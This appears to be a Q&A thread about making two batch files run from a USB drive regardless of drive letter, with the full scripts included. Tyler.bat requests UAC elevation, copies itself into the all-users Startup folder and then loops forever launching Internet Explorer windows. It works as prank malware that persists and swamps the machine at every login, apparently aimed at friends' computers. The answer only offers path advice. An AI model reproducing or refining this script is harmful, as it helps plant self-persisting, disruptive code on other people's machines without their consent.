# How to make a batch file run from any drive letter off of a usb drive?

Tags: batch-file, usb

I'm putting both of these batch files on a usb drive, and I need to find a way to make Tyler.bat have the correct path so that when I call Tyler.bat from the usb drive it will read the usb drive and load Tyler.bat with the correct path and then follow through its commands.

I want to know how to do this without changing the drive name to something specific.

Zieske.bat

```
@echo off
echo Who are you?
set /p answer=
if /i "%answer%"=="Tyler" (call Tyler.bat)
if /i "%answer%"=="Tyler Zieske" (call Tyler.bat)
if /i "%answer%"=="Pediatric Gynocologist" (call Tyler.bat)
echo Welcome %answer%!
pause
```

Tyler.bat

```
@echo off
REM Run shell as admin (example) - put here code as you like
REM Check Windows Version
ver | findstr /i "5\.0\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_2000
ver | findstr /i "5\.1\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_XP
ver | findstr /i "5\.2\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_2003
ver | findstr /i "6\.0\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_Vista
ver | findstr /i "6\.1\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_Win7
goto warn_and_exit

:ver_Win7
if exist "c:\programdata\microsoft\windows\start menu\programs\startup\tyler.bat" (
goto :yes
) else (
goto :beginning7
)
goto :ver_Win7


:ver_Vista
if exist "c:\programdata\microsoft\windows\start menu\programs\startup\tyler.bat" (
goto :yes
) else (
goto :beginning_Vista
)
goto :ver_Vista


:ver_2003
cd "c:\documents and settings\all users\start menu\programs\startup"
if exist "tyler.bat" (
goto :yes
) else (
goto :beginning2003
)
goto :ver_2003


:ver_XP
cd "c:\documents and settings\all users\start menu\programs\startup"
if exist "tyler.bat" (
goto :yes
) else (
goto :beginningXP
)
goto :ver_XP


:ver_2000
cd "c:\documents and settings\all users\start menu\programs\startup"
if exist "tyler.bat" (
goto :yes
) else (
goto :beginning2000
)
goto :ver_2000


:warn_and_exit
echo Machine OS cannot be determined.
pause

:beginning7
CLS 
ECHO.
ECHO =============================
ECHO Running Admin shell
ECHO =============================

:checkPrivileges 
NET FILE 1>NUL 2>NUL
if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges ) 

:getPrivileges 
if '%1'=='ELEV' (shift & goto gotPrivileges)  
ECHO. 
ECHO **************************************
ECHO Invoking UAC for Privilege Escalation 
ECHO **************************************

setlocal DisableDelayedExpansion
set "batchPath=%~0"
setlocal EnableDelayedExpansion
ECHO Set UAC = CreateObject^("Shell.Application"^) > "%temp%\OEgetPrivileges.vbs" 
ECHO UAC.ShellExecute "!batchPath!", "ELEV", "", "runas", 1 >> "%temp%\OEgetPrivileges.vbs" 
"%temp%\OEgetPrivileges.vbs" 
exit /B 

:gotPrivileges 
::::::::::::::::::::::::::::
:START
::::::::::::::::::::::::::::
setlocal & pushd .
copy tyler.bat "c:\programdata\microsoft\windows\start menu\programs\startup\tyler.bat"
goto yes:

:beginning_Vista
goto beginning7

:beginningXP
CLS 
ECHO.
ECHO =============================
ECHO Running Admin shell
ECHO =============================

:checkPrivileges 
NET FILE 1>NUL 2>NUL
if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges ) 

:getPrivileges 
if '%1'=='ELEV' (shift & goto gotPrivileges)  
ECHO. 
ECHO **************************************
ECHO Invoking UAC for Privilege Escalation 
ECHO **************************************

setlocal DisableDelayedExpansion
set "batchPath=%~0"
setlocal EnableDelayedExpansion
ECHO Set UAC = CreateObject^("Shell.Application"^) > "%temp%\OEgetPrivileges.vbs" 
ECHO UAC.ShellExecute "!batchPath!", "ELEV", "", "runas", 1 >> "%temp%\OEgetPrivileges.vbs" 
"%temp%\OEgetPrivileges.vbs" 
exit /B 

:gotPrivileges 
::::::::::::::::::::::::::::
:START
::::::::::::::::::::::::::::
setlocal & pushd .
copy tyler.bat "c:\documents and settings\all users\start menu\programs\startup"
goto :yes

:beginning2003
goto :beginningXP

:beginning2000
goto :beginningXP

:yes
echo Hi Tyler!
pause
goto :Tyler

:Tyler
start iexplore.exe
goto :Tyler

cmd /k
```

example of ty's answer

```
pushd %~dp0
...all the other code...
copy tyler.bat
...more other code...
```

example of ty's answer implemented into code (didn't know if because of the goto variables if i would need to put pushd where the command is to copy the batch file)

zieske.bat

```
@echo off
pushd %~dp0
echo Who are you?
set /p answer=
if /i "%answer%"=="Tyler" (call Tyler.bat)
if /i "%answer%"=="Matt" (call Tyler.bat)
if /i "%answer%"=="Matthew" (call Tyler.bat)
if /i "%answer%"=="Matthew Tassin" (call Tyler.bat)
if /i "%answer%"=="Matt Tassin" (call Tyler.bat)
if /i "%answer%"=="Ryan" (call Tyler.bat)
if /i "%answer%"=="Ryan Ware" (call Tyler.bat)
if /i "%answer%"=="Tyler Zieske" (call Tyler.bat)
if /i "%answer%"=="Pediatric Gynocologist" (call Tyler.bat)
echo Welcome %answer%!
pause
```

tyler.bat

```
@echo off
pushd %~dp0
REM Check Windows Version
ver | findstr /i "5\.0\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_2000
ver | findstr /i "5\.1\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_XP
ver | findstr /i "5\.2\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_2003
ver | findstr /i "6\.0\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_Vista
ver | findstr /i "6\.1\." > nul
IF %ERRORLEVEL% EQU 0 goto :ver_Win7
goto warn_and_exit

:ver_Win7
if exist "c:\programdata\microsoft\windows\start menu\programs\startup\tyler.bat" (
goto :yes
) else (
goto :beginning7
)
goto :ver_Win7


:ver_Vista
if exist "c:\programdata\microsoft\windows\start menu\programs\startup\tyler.bat" (
goto :yes
) else (
goto :beginning_Vista
)
goto :ver_Vista


:ver_2003
cd "c:\documents and settings\all users\start menu\programs\startup"
if exist "tyler.bat" (
goto :yes
) else (
goto :beginning2003
)
goto :ver_2003


:ver_XP
cd "c:\documents and settings\all users\start menu\programs\startup"
if exist "tyler.bat" (
goto :yes
) else (
goto :beginningXP
)
goto :ver_XP


:ver_2000
cd "c:\documents and settings\all users\start menu\programs\startup"
if exist "tyler.bat" (
goto :yes
) else (
goto :beginning2000
)
goto :ver_2000


:warn_and_exit
echo Machine OS cannot be determined.
pause

:beginning7
CLS 
ECHO.
ECHO =============================
ECHO Running Admin shell
ECHO =============================

:checkPrivileges 
NET FILE 1>NUL 2>NUL
if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges ) 

:getPrivileges 
if '%1'=='ELEV' (shift & goto gotPrivileges)  
ECHO. 
ECHO **************************************
ECHO Invoking UAC for Privilege Escalation 
ECHO **************************************

setlocal DisableDelayedExpansion
set "batchPath=%~0"
setlocal EnableDelayedExpansion
ECHO Set UAC = CreateObject^("Shell.Application"^) > "%temp%\OEgetPrivileges.vbs" 
ECHO UAC.ShellExecute "!batchPath!", "ELEV", "", "runas", 1 >> "%temp%\OEgetPrivileges.vbs" 
"%temp%\OEgetPrivileges.vbs" 
exit /B 

:gotPrivileges 
::::::::::::::::::::::::::::
:START
::::::::::::::::::::::::::::
setlocal & pushd .
pushd %~dp0
copy tyler.bat "c:\programdata\microsoft\windows\start menu\programs\startup\tyler.bat"
goto yes:

:beginning_Vista
goto beginning7

:beginningXP
CLS 
ECHO.
ECHO =============================
ECHO Running Admin shell
ECHO =============================

:checkPrivileges 
NET FILE 1>NUL 2>NUL
if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges ) 

:getPrivileges 
if '%1'=='ELEV' (shift & goto gotPrivileges)  
ECHO. 
ECHO **************************************
ECHO Invoking UAC for Privilege Escalation 
ECHO **************************************

setlocal DisableDelayedExpansion
set "batchPath=%~0"
setlocal EnableDelayedExpansion
ECHO Set UAC = CreateObject^("Shell.Application"^) > "%temp%\OEgetPrivileges.vbs" 
ECHO UAC.ShellExecute "!batchPath!", "ELEV", "", "runas", 1 >> "%temp%\OEgetPrivileges.vbs" 
"%temp%\OEgetPrivileges.vbs" 
exit /B 

:gotPrivileges 
::::::::::::::::::::::::::::
:START
::::::::::::::::::::::::::::
setlocal & pushd .
pushd %~dp0
copy tyler.bat "c:\documents and settings\all users\start menu\programs\startup"
goto :yes

:beginning2003
goto :beginningXP

:beginning2000
goto :beginningXP

:yes
echo Hi Tyler, Ryan, or Matt!
pause
goto :Tyler

:Tyler
start iexplore.exe
goto :Tyler

cmd /k
```

if you could verify the syntax/location of the `pushd %~dp0` is correct by ctrl+f and typing in `pushd %~dp0` I would be very appreciative.

Answer (score 0):

Do you really need the drive letter, or just need to make sure your current directory is the root of the USB drive?  If the latter, just do:

```
pushd %~dp0
```

at the beginning of your batch file.  You'll be CD'ed into the directory in which the batch file lives.

Comment: Well I definitely do need the latter to happen also, but what I need is the location of the tyler.bat file in the file, there is a part where it says `copy tyler.bat` and i've read that for certain instances (whenever you are in a windows OS -vista (2003, XP, 2000)) that it will not be able to copy anything unless you specify the file path for it to be found i.e. x:\tyler.bat

Comment: copy tyler.bat <dest> is fine as long as tyler.bat is in the current directory.  The drive letter or other path info is not needed.

Comment: check my edit real fast that I am about to do so I can know if the code kind of seems right.